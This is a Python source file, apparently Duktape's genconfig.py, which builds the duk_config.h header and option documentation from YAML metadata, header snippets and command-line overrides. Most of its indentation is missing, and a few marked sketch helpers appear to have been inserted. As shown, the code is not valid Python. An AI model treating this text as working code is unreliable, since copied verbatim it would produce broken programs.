# Inserted values are converted to Snippets so that their provides/requires
# information can be tracked. When non-C outputs are created, these will be
# bogus but ignored.
class FileBuilder:
vals = None # snippet list
base_dir = None
use_cpp_warning = False
def __init__(self, base_dir=None, use_cpp_warning=False):
self.vals = []
self.base_dir = base_dir
self.use_cpp_warning = use_cpp_warning
def line(self, line):
self.vals.append(Snippet([ line ]))
def lines(self, lines):
if len(lines) > 0 and lines[-1] == '\n':
lines = lines[:-1] # strip last newline to avoid empty line
self.vals.append(Snippet(lines.split('\n')))
def empty(self):
self.vals.append(Snippet([ '' ]))
def rst_heading(self, title, char, doubled=False):
tmp = []
if doubled:
tmp.append(char * len(title))
tmp.append(title)
tmp.append(char * len(title))
self.vals.append(Snippet(tmp))
def snippet_relative(self, fn):
sn = Snippet.fromFile(os.path.join(self.base_dir, fn))
self.vals.append(sn)
return sn
def snippet_absolute(self, fn):
sn = Snippet.fromFile(fn)
self.vals.append(sn)
return sn
def cpp_error(self, msg):
# XXX: assume no newlines etc
self.vals.append(Snippet([ '#error %s' % msg ]))
def cpp_warning(self, msg):
# XXX: assume no newlines etc
# XXX: support compiler specific warning mechanisms
if self.use_cpp_warning:
# C preprocessor '#warning' is often supported
self.vals.append(Snippet([ '#warning %s' % msg ]))
else:
self.vals.append(Snippet([ '/* WARNING: %s */' % msg ]))
def cpp_warning_or_error(self, msg, is_error=True):
if is_error:
self.cpp_error(msg)
else:
self.cpp_warning(msg)
def chdr_comment_line(self, msg):
self.vals.append(Snippet([ '/* %s */' % msg ]))
def chdr_block_heading(self, msg):
lines = []
lines.append('')
lines.append('/*')
lines.append(' * ' + msg)
lines.append(' */')
lines.append('')
self.vals.append(Snippet(lines))
def join(self):
tmp = []
for line in self.vals:
if not isinstance(line, object):
raise Exception('self.vals must be all snippets')
for x in line.lines: # x is a Snippet
tmp.append(x)
return '\n'.join(tmp)
def fill_dependencies_for_snippets(self, idx_deps):
fill_dependencies_for_snippets(self.vals, idx_deps)
# Insert missing define dependencies into index 'idx_deps' repeatedly
# until no unsatisfied dependencies exist. This is used to pull in
# the required DUK_F_xxx helper defines without pulling them all in.
# The resolution mechanism also ensures dependencies are pulled in the
# correct order, i.e. DUK_F_xxx helpers may depend on each other (as
# long as there are no circular dependencies).
#
# XXX: this can be simplified a lot
def fill_dependencies_for_snippets(snippets, idx_deps):
# graph[A] = [ B, ... ] <-> B, ... provide something A requires.
graph = {}
snlist = []
resolved = [] # for printing only
def add(sn):
if sn in snlist:
return # already present
snlist.append(sn)
to_add = []
for k in sn.requires.keys():
if assumed_provides.has_key(k):
continue
found = False
for sn2 in snlist:
if sn2.provides.has_key(k):
if not graph.has_key(sn):
graph[sn] = []
graph[sn].append(sn2)
found = True # at least one other node provides 'k'
if not found:
logger.debug('Resolving %r' % k)
resolved.append(k)
# Find a header snippet which provides the missing define.
# Some DUK_F_xxx files provide multiple defines, so we don't
# necessarily know the snippet filename here.
sn_req = None
for sn2 in helper_snippets:
if sn2.provides.has_key(k):
sn_req = sn2
break
if sn_req is None:
logger.debug(repr(sn.lines))
raise Exception('cannot resolve missing require: %r' % k)
# Snippet may have further unresolved provides; add recursively
to_add.append(sn_req)
if not graph.has_key(sn):
graph[sn] = []
graph[sn].append(sn_req)
for sn in to_add:
add(sn)
# Add original snippets. This fills in the required nodes
# recursively.
for sn in snippets:
add(sn)
# Figure out fill-ins by looking for snippets not in original
# list and without any unserialized dependent nodes.
handled = {}
for sn in snippets:
handled[sn] = True
keepgoing = True
while keepgoing:
keepgoing = False
for sn in snlist:
if handled.has_key(sn):
continue
success = True
for dep in graph.get(sn, []):
if not handled.has_key(dep):
success = False
if success:
snippets.insert(idx_deps, sn)
idx_deps += 1
snippets.insert(idx_deps, Snippet([ '' ]))
idx_deps += 1
handled[sn] = True
keepgoing = True
break
# XXX: detect and handle loops cleanly
for sn in snlist:
if handled.has_key(sn):
continue
logger.debug('UNHANDLED KEY')
logger.debug('PROVIDES: %r' % sn.provides)
logger.debug('REQUIRES: %r' % sn.requires)
logger.debug('\n'.join(sn.lines))
#logger.debug(repr(graph))
#logger.debug(repr(snlist))
logger.debug('Resolved helper defines: %r' % resolved)
logger.debug('Resolved %d helper defines' % len(resolved))
def serialize_snippet_list(snippets):
ret = []
emitted_provides = {}
for k in assumed_provides.keys():
emitted_provides[k] = True
for sn in snippets:
ret += sn.lines
for k in sn.provides.keys():
emitted_provides[k] = True
for k in sn.requires.keys():
if not emitted_provides.has_key(k):
# XXX: conditional warning, happens in some normal cases
logger.warning('define %r required, not provided so far' % k)
pass
return '\n'.join(ret)
def remove_duplicate_newlines(x):
ret = []
empty = False
for line in x.split('\n'):
if line == '':
if empty:
pass
else:
ret.append(line)
empty = True
else:
empty = False
ret.append(line)
return '\n'.join(ret)
def scan_use_defs(dirname):
global use_defs, use_defs_list
use_defs = {}
use_defs_list = []
for fn in os.listdir(dirname):
root, ext = os.path.splitext(fn)
if not root.startswith('DUK_USE_') or ext != '.yaml':
continue
with open(os.path.join(dirname, fn), 'rb') as f:
doc = yaml.load(f)
if doc.get('example', False):
continue
if doc.get('unimplemented', False):
logger.warning('unimplemented: %s' % fn)
continue
dockeys = doc.keys()
for k in dockeys:
if not k in allowed_use_meta_keys:
logger.warning('unknown key %s in metadata file %s' % (k, fn))
for k in required_use_meta_keys:
if not k in dockeys:
logger.warning('missing key %s in metadata file %s' % (k, fn))
use_defs[doc['define']] = doc
keys = use_defs.keys()
keys.sort()
for k in keys:
use_defs_list.append(use_defs[k])
def scan_opt_defs(dirname):
global opt_defs, opt_defs_list
opt_defs = {}
opt_defs_list = []
for fn in os.listdir(dirname):
root, ext = os.path.splitext(fn)
if not root.startswith('DUK_OPT_') or ext != '.yaml':
continue
with open(os.path.join(dirname, fn), 'rb') as f:
doc = yaml.load(f)
if doc.get('example', False):
continue
if doc.get('unimplemented', False):
logger.warning('unimplemented: %s' % fn)
continue
dockeys = doc.keys()
for k in dockeys:
if not k in allowed_opt_meta_keys:
logger.warning('unknown key %s in metadata file %s' % (k, fn))
for k in required_opt_meta_keys:
if not k in dockeys:
logger.warning('missing key %s in metadata file %s' % (k, fn))
opt_defs[doc['define']] = doc
keys = opt_defs.keys()
keys.sort()
for k in keys:
opt_defs_list.append(opt_defs[k])
def scan_use_tags():
global use_tags, use_tags_list
use_tags = {}
for doc in use_defs_list:
for tag in doc.get('tags', []):
use_tags[tag] = True
use_tags_list = use_tags.keys()
use_tags_list.sort()
def scan_tags_meta(filename):
global tags_meta
with open(filename, 'rb') as f:
tags_meta = yaml.load(f)
def scan_helper_snippets(dirname): # DUK_F_xxx snippets
global helper_snippets
helper_snippets = []
for fn in os.listdir(dirname):
if (fn[0:6] != 'DUK_F_'):
continue
logger.debug('Autoscanning snippet: %s' % fn)
helper_snippets.append(Snippet.fromFile(os.path.join(dirname, fn)))
def get_opt_defs(removed=True, deprecated=True, unused=True):
ret = []
for doc in opt_defs_list:
# XXX: aware of target version
if removed == False and doc.get('removed', None) is not None:
continue
if deprecated == False and doc.get('deprecated', None) is not None:
continue
if unused == False and doc.get('unused', False) == True:
continue
ret.append(doc)
return ret
def get_use_defs(removed=True, deprecated=True, unused=True):
ret = []
for doc in use_defs_list:
# XXX: aware of target version
if removed == False and doc.get('removed', None) is not None:
continue
if deprecated == False and doc.get('deprecated', None) is not None:
continue
if unused == False and doc.get('unused', False) == True:
continue
ret.append(doc)
return ret
def validate_platform_file(filename):
sn = Snippet.fromFile(filename)
for req in platform_required_provides:
if req not in sn.provides:
raise Exception('Platform %s is missing %s' % (filename, req))
# DUK_SETJMP, DUK_LONGJMP, DUK_JMPBUF_TYPE are optional, fill-in
# provides if none defined.
def validate_architecture_file(filename):
sn = Snippet.fromFile(filename)
for req in architecture_required_provides:
if req not in sn.provides:
raise Exception('Architecture %s is missing %s' % (filename, req))
# Byte order and alignment defines are allowed to be missing,
# a fill-in will handle them. This is necessary because for
# some architecture byte order and/or alignment may vary between
# targets and may be software configurable.
# XXX: require automatic detection to be signaled?
# e.g. define DUK_USE_ALIGN_BY -1
# define DUK_USE_BYTE_ORDER -1
def validate_compiler_file(filename):
sn = Snippet.fromFile(filename)
for req in compiler_required_provides:
if req not in sn.provides:
raise Exception('Compiler %s is missing %s' % (filename, req))
def get_tag_title(tag):
meta = tags_meta.get(tag, None)
if meta is None:
return tag
else:
return meta.get('title', tag)
def get_tag_description(tag):
meta = tags_meta.get(tag, None)
if meta is None:
return None
else:
return meta.get('description', None)
def get_tag_list_with_preferred_order(preferred):
tags = []
# Preferred tags first
for tag in preferred:
if tag not in tags:
tags.append(tag)
# Remaining tags in alphabetic order
for tag in use_tags_list:
if tag not in tags:
tags.append(tag)
logger.debug('Effective tag order: %r' % tags)
return tags
def rst_format(text):
# XXX: placeholder, need to decide on markup conventions for YAML files
ret = []
for para in text.split('\n'):
if para == '':
continue
ret.append(para)
return '\n\n'.join(ret)
def cint_encode(x):
if not isinstance(x, (int, long)):
raise Exception('invalid input: %r' % x)
# XXX: unsigned constants?
if x > 0x7fffffff or x < -0x80000000:
return '%dLL' % x
elif x > 0x7fff or x < -0x8000:
return '%dL' % x
else:
return '%d' % x
def cstr_encode(x):
if isinstance(x, unicode):
x = x.encode('utf-8')
if not isinstance(x, str):
raise Exception('invalid input: %r' % x)
res = '"'
term = False
has_terms = False
for c in x:
if term:
# Avoid ambiguous hex escapes
res += '" "'
term = False
has_terms = True
o = ord(c)
if o < 0x20 or o > 0x7e or c in '"\\':
res += '\\x%02x' % o
term = True
else:
res += c
res += '"'
if has_terms:
res = '(' + res + ')'
return res
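# Hedged sketch (not part of genconfig): how the two encoders above render
# Python values into C source fragments.
def _example_encoders():
    assert cint_encode(42) == '42'            # fits in 16 bits -> plain literal
    assert cint_encode(100000) == '100000L'   # needs a long suffix
    assert cstr_encode('hello') == '"hello"'
    return cint_encode(3000000000), cstr_encode('tab\there')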
#
# Autogeneration of option documentation
#
# Shared helper to generate DUK_USE_xxx documentation.
# XXX: unfinished placeholder
def generate_option_documentation(opts, opt_list=None, rst_title=None, include_default=False):
ret = FileBuilder(use_cpp_warning=opts.use_cpp_warning)
tags = get_tag_list_with_preferred_order(doc_tag_order)
title = rst_title
ret.rst_heading(title, '=', doubled=True)
handled = {}
for tag in tags:
first = True
for doc in opt_list:
if tag != doc['tags'][0]: # sort under primary tag
continue
dname = doc['define']
desc = doc.get('description', None)
if handled.has_key(dname):
raise Exception('define handled twice, should not happen: %r' % dname)
handled[dname] = True
if first: # emit tag heading only if there are subsections
ret.empty()
ret.rst_heading(get_tag_title(tag), '=')
tag_desc = get_tag_description(tag)
if tag_desc is not None:
ret.empty()
ret.line(rst_format(tag_desc))
first = False
ret.empty()
ret.rst_heading(dname, '-')
if desc is not None:
ret.empty()
ret.line(rst_format(desc))
if include_default:
ret.empty()
ret.line('Default: ``' + str(doc['default']) + '``') # XXX: rst or other format
for doc in opt_list:
dname = doc['define']
if not handled.has_key(dname):
raise Exception('unhandled define (maybe missing from tags list?): %r' % dname)
ret.empty()
return ret.join()
def generate_config_option_documentation(opts):
defs = get_use_defs()
return generate_option_documentation(opts, opt_list=defs, rst_title='Duktape config options', include_default=True)
#
# Helpers for duk_config.h generation
#
def get_forced_options(opts):
# Forced options, last occurrence wins (allows a base config file to be
# overridden by a more specific one).
forced_opts = {}
for val in opts.force_options_yaml:
doc = yaml.load(StringIO(val))
for k in doc.keys():
if use_defs.has_key(k):
pass # key is known
else:
logger.warning('option override key %s not defined in metadata, ignoring' % k)
forced_opts[k] = doc[k] # shallow copy
if len(forced_opts.keys()) > 0:
logger.debug('Overrides: %s' % json.dumps(forced_opts))
return forced_opts
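# Hedged sketch (not part of genconfig): forced options arrive as a list of small
# YAML documents (opts.force_options_yaml), with later keys overriding earlier
# ones. DUK_USE_ES6_PROXY is referenced elsewhere in this file; the exact set of
# keys shown here is illustrative only.
_EXAMPLE_FORCE_OPTIONS_YAML = [
    'DUK_USE_ES6_PROXY: false',
    'DUK_USE_FASTINT: true',
]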
# Emit a default #define / #undef for an option based on
# a config option metadata node (parsed YAML doc).
def emit_default_from_config_meta(ret, doc, forced_opts, undef_done, active_opts):
defname = doc['define']
defval = forced_opts.get(defname, doc['default'])
# NOTE: careful with Python equality, e.g. "0 == False" is true.
if isinstance(defval, bool) and defval == True:
ret.line('#define ' + defname)
active_opts[defname] = True
elif isinstance(defval, bool) and defval == False:
if not undef_done:
ret.line('#undef ' + defname)
else:
# Default value is false, and caller has emitted
# an unconditional #undef, so don't emit a duplicate
pass
active_opts[defname] = False
elif isinstance(defval, (int, long)):
# integer value
ret.line('#define ' + defname + ' ' + cint_encode(defval))
active_opts[defname] = True
elif isinstance(defval, (str, unicode)):
# verbatim value
ret.line('#define ' + defname + ' ' + defval)
active_opts[defname] = True
elif isinstance(defval, dict):
if defval.has_key('verbatim'):
# verbatim text for the entire line
ret.line(defval['verbatim'])
elif defval.has_key('string'):
# C string value
ret.line('#define ' + defname + ' ' + cstr_encode(defval['string']))
else:
raise Exception('unsupported value for option %s: %r' % (defname, defval))
active_opts[defname] = True
else:
raise Exception('unsupported value for option %s: %r' % (defname, defval))
# Add a header snippet for detecting presence of DUK_OPT_xxx feature
# options and warning/erroring if application defines them. Useful for
# Duktape 2.x migration.
def add_legacy_feature_option_checks(opts, ret):
ret.chdr_block_heading('Checks for legacy feature options (DUK_OPT_xxx)')
ret.empty()
defs = []
for doc in get_opt_defs():
if doc['define'] not in defs:
defs.append(doc['define'])
defs.sort()
for optname in defs:
ret.line('#if defined(%s)' % optname)
ret.cpp_warning_or_error('unsupported legacy feature option %s used' % optname, opts.sanity_strict)
ret.line('#endif')
ret.empty()
# Add a header snippet for checking consistency of DUK_USE_xxx config
# options, e.g. inconsistent options, invalid option values.
def add_config_option_checks(opts, ret):
ret.chdr_block_heading('Checks for config option consistency (DUK_USE_xxx)')
ret.empty()
defs = []
for doc in get_use_defs():
if doc['define'] not in defs:
defs.append(doc['define'])
defs.sort()
for optname in defs:
doc = use_defs[optname]
dname = doc['define']
# XXX: more checks
if doc.get('removed', None) is not None:
ret.line('#if defined(%s)' % dname)
ret.cpp_warning_or_error('unsupported config option used (option has been removed): %s' % dname, opts.sanity_strict)
ret.line('#endif')
elif doc.get('deprecated', None) is not None:
ret.line('#if defined(%s)' % dname)
ret.cpp_warning_or_error('unsupported config option used (option has been deprecated): %s' % dname, opts.sanity_strict)
ret.line('#endif')
for req in doc.get('requires', []):
ret.line('#if defined(%s) && !defined(%s)' % (dname, req))
ret.cpp_warning_or_error('config option %s requires option %s (which is missing)' % (dname, req), opts.sanity_strict)
ret.line('#endif')
for req in doc.get('conflicts', []):
ret.line('#if defined(%s) && defined(%s)' % (dname, req))
ret.cpp_warning_or_error('config option %s conflicts with option %s (which is also defined)' % (dname, req), opts.sanity_strict)
ret.line('#endif')
ret.empty()
ret.snippet_relative('cpp_exception_sanity.h.in')
ret.empty()
# Add a header snippet for providing a __OVERRIDE_DEFINES__ section.
def add_override_defines_section(opts, ret):
ret.empty()
ret.line('/*')
ret.line(' * You may add overriding #define/#undef directives below for')
ret.line(' * customization. You of course cannot un-#include or un-typedef')
ret.line(' * anything; these require direct changes above.')
ret.line(' */')
ret.empty()
ret.line('/* __OVERRIDE_DEFINES__ */')
ret.empty()
# Development time helper: add DUK_ACTIVE which provides a runtime C string
# indicating what DUK_USE_xxx config options are active at run time. This
# is useful in genconfig development so that one can e.g. diff the active
# run time options of two headers. This is intended just for genconfig
# development and is not available in normal headers.
def add_duk_active_defines_macro(ret):
ret.chdr_block_heading('DUK_ACTIVE_DEFINES macro (development only)')
idx = 0
for doc in get_use_defs():
defname = doc['define']
ret.line('#if defined(%s)' % defname)
ret.line('#define DUK_ACTIVE_DEF%d " %s"' % (idx, defname))
ret.line('#else')
ret.line('#define DUK_ACTIVE_DEF%d ""' % idx)
ret.line('#endif')
idx += 1
tmp = []
for i in xrange(idx):
tmp.append('DUK_ACTIVE_DEF%d' % i)
ret.line('#define DUK_ACTIVE_DEFINES ("Active: ["' + ' '.join(tmp) + ' " ]")')
#
# duk_config.h generation
#
# Generate a duk_config.h where platform, architecture, and compiler are
# all either autodetected or specified by user.
#
# Autodetection is based on a configured list of supported platforms,
# architectures, and compilers. For example, platforms.yaml defines the
# supported platforms and provides a helper define (DUK_F_xxx) to use for
# detecting that platform, and names the header snippet to provide the
# platform-specific definitions. Necessary dependencies (DUK_F_xxx) are
# automatically pulled in.
#
# Automatic "fill ins" are used for mandatory platform, architecture, and
# compiler defines which have a reasonable portable default. This reduces
# e.g. compiler-specific define count because there are a lot of compiler
# macros which have a good default.
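# For illustration, a platforms.yaml autodetect entry might look roughly like
# this (hypothetical sketch; the actual metadata shipped with Duktape may differ):
#   autodetect:
#     - name: Linux
#       check: DUK_F_LINUX
#       include: platform_linux.h.in
# Each entry becomes one branch of the emitted #if/#elif chain and pulls in the
# named header snippet; an entry without a 'check' acts as the final #else fallback.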
def generate_duk_config_header(opts, meta_dir):
ret = FileBuilder(base_dir=os.path.join(meta_dir, 'header-snippets'), \
use_cpp_warning=opts.use_cpp_warning)
# Parse forced options. Warn about missing forced options when it is
# strongly recommended that the option is provided.
forced_opts = get_forced_options(opts)
for doc in use_defs_list:
if doc.get('warn_if_missing', False) and not forced_opts.has_key(doc['define']):
logger.warning('Recommended config option ' + doc['define'] + ' not provided')
# Gather a map of "active options" for genbuiltins.py. This is used to
# implement proper optional built-ins, e.g. if a certain config option
# (like DUK_USE_ES6_PROXY) is disabled, the corresponding objects and
# properties are dropped entirely. The mechanism is not perfect: it won't
# detect fixup changes for example.
active_opts = {}
platforms = None
with open(os.path.join(meta_dir, 'platforms.yaml'), 'rb') as f:
platforms = yaml.load(f)
architectures = None
with open(os.path.join(meta_dir, 'architectures.yaml'), 'rb') as f:
architectures = yaml.load(f)
compilers = None
with open(os.path.join(meta_dir, 'compilers.yaml'), 'rb') as f:
compilers = yaml.load(f)
# XXX: indicate feature option support, sanity checks enabled, etc
# in general summary of options, perhaps genconfig command line?
ret.line('/*')
ret.line(' * duk_config.h configuration header generated by genconfig.py.')
ret.line(' *')
ret.line(' * Git commit: %s' % (opts.git_commit or 'n/a'))
ret.line(' * Git describe: %s' % (opts.git_describe or 'n/a'))
ret.line(' * Git branch: %s' % (opts.git_branch or 'n/a'))
ret.line(' *')
if opts.platform is not None:
ret.line(' * Platform: ' + opts.platform)
else:
ret.line(' * Supported platforms:')
for platf in platforms['autodetect']:
ret.line(' * - %s' % platf.get('name', platf.get('check')))
ret.line(' *')
if opts.architecture is not None:
ret.line(' * Architecture: ' + opts.architecture)
else:
ret.line(' * Supported architectures:')
for arch in architectures['autodetect']:
ret.line(' * - %s' % arch.get('name', arch.get('check')))
ret.line(' *')
if opts.compiler is not None:
ret.line(' * Compiler: ' + opts.compiler)
else:
ret.line(' * Supported compilers:')
for comp in compilers['autodetect']:
ret.line(' * - %s' % comp.get('name', comp.get('check')))
ret.line(' *')
ret.line(' */')
ret.empty()
ret.line('#if !defined(DUK_CONFIG_H_INCLUDED)')
ret.line('#define DUK_CONFIG_H_INCLUDED')
ret.empty()
ret.chdr_block_heading('Intermediate helper defines')
# DLL build affects visibility attributes on Windows but unfortunately
# cannot be detected automatically from preprocessor defines or such.
# DLL build status is passed in explicitly (--dll option) and hidden behind DUK_F_DLL_BUILD.
ret.chdr_comment_line('DLL build detection')
if opts.dll:
ret.line('/* configured for DLL build */')
ret.line('#define DUK_F_DLL_BUILD')
else:
ret.line('/* not configured for DLL build */')
ret.line('#undef DUK_F_DLL_BUILD')
ret.empty()
idx_deps = len(ret.vals) # position where to emit DUK_F_xxx dependencies
# Feature selection, system include, Date provider
# Most #include statements are here
if opts.platform is not None:
ret.chdr_block_heading('Platform: ' + opts.platform)
ret.snippet_relative('platform_cppextras.h.in')
ret.empty()
# XXX: better to lookup platforms metadata
include = 'platform_%s.h.in' % opts.platform
abs_fn = os.path.join(meta_dir, 'platforms', include)
validate_platform_file(abs_fn)
ret.snippet_absolute(abs_fn)
else:
ret.chdr_block_heading('Platform autodetection')
ret.snippet_relative('platform_cppextras.h.in')
ret.empty()
for idx, platf in enumerate(platforms['autodetect']):
check = platf.get('check', None)
include = platf['include']
abs_fn = os.path.join(meta_dir, 'platforms', include)
validate_platform_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % platf.get('name', '???'))
ret.snippet_absolute(abs_fn)
ret.line('#endif /* autodetect platform */')
ret.empty()
ret.snippet_relative('platform_sharedincludes.h.in')
ret.empty()
byteorder_provided_by_all = True # byteorder provided by all architecture files
alignment_provided_by_all = True # alignment provided by all architecture files
packedtval_provided_by_all = True # packed tval provided by all architecture files
if opts.architecture is not None:
ret.chdr_block_heading('Architecture: ' + opts.architecture)
# XXX: better to lookup architectures metadata
include = 'architecture_%s.h.in' % opts.architecture
abs_fn = os.path.join(meta_dir, 'architectures', include)
validate_architecture_file(abs_fn)
sn = ret.snippet_absolute(abs_fn)
if not sn.provides.get('DUK_USE_BYTEORDER', False):
byteorder_provided_by_all = False
if not sn.provides.get('DUK_USE_ALIGN_BY', False):
alignment_provided_by_all = False
if sn.provides.get('DUK_USE_PACKED_TVAL', False):
ret.line('#define DUK_F_PACKED_TVAL_PROVIDED') # signal to fillin
else:
packedtval_provided_by_all = False
else:
ret.chdr_block_heading('Architecture autodetection')
for idx, arch in enumerate(architectures['autodetect']):
check = arch.get('check', None)
include = arch['include']
abs_fn = os.path.join(meta_dir, 'architectures', include)
validate_architecture_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % arch.get('name', '???'))
sn = ret.snippet_absolute(abs_fn)
if not sn.provides.get('DUK_USE_BYTEORDER', False):
byteorder_provided_by_all = False
if not sn.provides.get('DUK_USE_ALIGN_BY', False):
alignment_provided_by_all = False
if sn.provides.get('DUK_USE_PACKED_TVAL', False):
ret.line('#define DUK_F_PACKED_TVAL_PROVIDED') # signal to fillin
else:
packedtval_provided_by_all = False
ret.line('#endif /* autodetect architecture */')
ret.empty()
if opts.compiler is not None:
ret.chdr_block_heading('Compiler: ' + opts.compiler)
# XXX: better to lookup compilers metadata
include = 'compiler_%s.h.in' % opts.compiler
abs_fn = os.path.join(meta_dir, 'compilers', include)
validate_compiler_file(abs_fn)
sn = ret.snippet_absolute(abs_fn)
else:
ret.chdr_block_heading('Compiler autodetection')
for idx, comp in enumerate(compilers['autodetect']):
check = comp.get('check', None)
include = comp['include']
abs_fn = os.path.join(meta_dir, 'compilers', include)
validate_compiler_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % comp.get('name', '???'))
sn = ret.snippet_absolute(abs_fn)
ret.line('#endif /* autodetect compiler */')
ret.empty()
# DUK_F_UCLIBC is special because __UCLIBC__ is provided by an #include
# file, so the check must happen after platform includes. It'd be nice
# for this to be automatic (e.g. DUK_F_UCLIBC.h.in could indicate the
# dependency somehow).
ret.snippet_absolute(os.path.join(meta_dir, 'helper-snippets', 'DUK_F_UCLIBC.h.in'))
ret.empty()
# XXX: platform/compiler could provide types; if so, need some signaling
# defines like DUK_F_TYPEDEFS_DEFINED
# Number types
if opts.c99_types_only:
ret.snippet_relative('types1.h.in')
ret.line('/* C99 types assumed */')
ret.snippet_relative('types_c99.h.in')
ret.empty()
else:
ret.snippet_relative('types1.h.in')
ret.line('#if defined(DUK_F_HAVE_INTTYPES)')
ret.line('/* C99 or compatible */')
ret.empty()
ret.snippet_relative('types_c99.h.in')
ret.empty()
ret.line('#else /* C99 types */')
ret.empty()
ret.snippet_relative('types_legacy.h.in')
ret.empty()
ret.line('#endif /* C99 types */')
ret.empty()
ret.snippet_relative('types2.h.in')
ret.empty()
ret.snippet_relative('64bitops.h.in')
ret.empty()
# Platform, architecture, compiler fillins. These are after all
# detection so that e.g. DUK_SPRINTF() can be provided by platform
# or compiler before trying a fill-in.
ret.chdr_block_heading('Fill-ins for platform, architecture, and compiler')
ret.snippet_relative('platform_fillins.h.in')
ret.empty()
ret.snippet_relative('architecture_fillins.h.in')
if not byteorder_provided_by_all:
ret.empty()
ret.snippet_relative('byteorder_fillin.h.in')
if not alignment_provided_by_all:
ret.empty()
ret.snippet_relative('alignment_fillin.h.in')
ret.empty()
ret.snippet_relative('compiler_fillins.h.in')
ret.empty()
ret.snippet_relative('inline_workaround.h.in')
ret.empty()
if not packedtval_provided_by_all:
ret.empty()
ret.snippet_relative('packed_tval_fillin.h.in')
# Object layout
ret.snippet_relative('object_layout.h.in')
ret.empty()
# Detect and reject 'fast math'
ret.snippet_relative('reject_fast_math.h.in')
ret.empty()
# Emit forced options. If a corresponding option is already defined
# by a snippet above, #undef it first.
tmp = Snippet(ret.join().split('\n'))
first_forced = True
for doc in get_use_defs(removed=not opts.omit_removed_config_options,
deprecated=not opts.omit_deprecated_config_options,
unused=not opts.omit_unused_config_options):
defname = doc['define']
if not forced_opts.has_key(defname):
continue
if not doc.has_key('default'):
raise Exception('config option %s is missing default value' % defname)
if first_forced:
ret.chdr_block_heading('Forced options')
first_forced = False
undef_done = False
if tmp.provides.has_key(defname):
ret.line('#undef ' + defname)
undef_done = True
emit_default_from_config_meta(ret, doc, forced_opts, undef_done, active_opts)
ret.empty()
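# Illustration only (hypothetical option and value): forcing DUK_USE_TRACEBACK_DEPTH=10
# when a snippet above already defined it would emit roughly:
#   #undef DUK_USE_TRACEBACK_DEPTH
#   #define DUK_USE_TRACEBACK_DEPTH 10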
# If manually-edited snippets don't #define or #undef a certain
# config option, emit a default value here. This is useful to
# fill-in for new config options not covered by manual snippets
# (which is intentional).
tmp = Snippet(ret.join().split('\n'))
need = {}
for doc in get_use_defs(removed=False):
need[doc['define']] = True
for k in tmp.provides.keys():
if need.has_key(k):
del need[k]
need_keys = sorted(need.keys())
if len(need_keys) > 0:
ret.chdr_block_heading('Autogenerated defaults')
for k in need_keys:
logger.debug('config option %s not covered by manual snippets, emitting default automatically' % k)
emit_default_from_config_meta(ret, use_defs[k], {}, False, active_opts)
ret.empty()
if len(opts.fixup_header_lines) > 0:
ret.chdr_block_heading('Fixups')
for line in opts.fixup_header_lines:
ret.line(line)
ret.empty()
add_override_defines_section(opts, ret)
# Date provider snippet is after custom header and overrides, so that
# the user may define e.g. DUK_USE_DATE_NOW_GETTIMEOFDAY in their
# custom header.
ret.snippet_relative('date_provider.h.in')
ret.empty()
ret.fill_dependencies_for_snippets(idx_deps)
if opts.emit_legacy_feature_check:
add_legacy_feature_option_checks(opts, ret)
if opts.emit_config_sanity_check:
add_config_option_checks(opts, ret)
if opts.add_active_defines_macro:
add_duk_active_defines_macro(ret)
# Derived defines (DUK_USE_INTEGER_LE, etc) from DUK_USE_BYTEORDER.
# Duktape internals currently rely on the derived defines. This is
# after sanity checks because the derived defines are marked removed.
ret.snippet_relative('byteorder_derived.h.in')
ret.empty()
ret.line('#endif /* DUK_CONFIG_H_INCLUDED */')
ret.empty() # for trailing newline
return remove_duplicate_newlines(ret.join()), active_opts
#
# Main
#
def add_genconfig_optparse_options(parser, direct=False):
# Forced options from multiple sources are gathered into a shared list
# so that the override order remains the same as on the command line.
force_options_yaml = []
def add_force_option_yaml(option, opt, value, parser):
# XXX: check that YAML parses
force_options_yaml.append(value)
def add_force_option_file(option, opt, value, parser):
# XXX: check that YAML parses
with open(value, 'rb') as f:
force_options_yaml.append(f.read())
def add_force_option_define(option, opt, value, parser):
tmp = value.split('=')
if len(tmp) == 1:
doc = { tmp[0]: True }
elif len(tmp) == 2:
doc = { tmp[0]: tmp[1] }
else:
raise Exception('invalid option value: %r' % value)
force_options_yaml.append(yaml.safe_dump(doc))
def add_force_option_undefine(option, opt, value, parser):
tmp = value.split('=')
if len(tmp) == 1:
doc = { tmp[0]: False }
else:
raise Exception('invalid option value: %r' % value)
force_options_yaml.append(yaml.safe_dump(doc))
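# Illustration only (hypothetical options): the callbacks above turn command line
# arguments into small YAML fragments that are merged later in command-line order:
#   '-DDUK_USE_TRACEBACK_DEPTH=10' -> yaml.safe_dump({'DUK_USE_TRACEBACK_DEPTH': '10'})
#   '-UDUK_USE_ES6_PROXY'          -> yaml.safe_dump({'DUK_USE_ES6_PROXY': False})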
fixup_header_lines = []
def add_fixup_header_line(option, opt, value, parser):
fixup_header_lines.append(value)
def add_fixup_header_file(option, opt, value, parser):
with open(value, 'rb') as f:
for line in f:
if line[-1] == '\n':
line = line[:-1]
fixup_header_lines.append(line)
if direct:
parser.add_option('--metadata', dest='config_metadata', default=None, help='metadata directory')
parser.add_option('--output', dest='output', default=None, help='output filename for C header or RST documentation file')
parser.add_option('--output-active-options', dest='output_active_options', default=None, help='output JSON file with active config options information')
else:
# Different option name when called through configure.py,
# also no --output option.
parser.add_option('--config-metadata', dest='config_metadata', default=None, help='metadata directory (defaulted based on configure.py script path)')
parser.add_option('--platform', dest='platform', default=None, help='platform (default is autodetect)')
parser.add_option('--compiler', dest='compiler', default=None, help='compiler (default is autodetect)')
parser.add_option('--architecture', dest='architecture', default=None, help='architecture (default is autodetect)')
parser.add_option('--c99-types-only', dest='c99_types_only', action='store_true', default=False, help='assume C99 types, no legacy type detection')
parser.add_option('--dll', dest='dll', action='store_true', default=False, help='dll build of Duktape, affects symbol visibility macros especially on Windows')
parser.add_option('--support-feature-options', dest='support_feature_options', action='store_true', default=False, help=optparse.SUPPRESS_HELP)
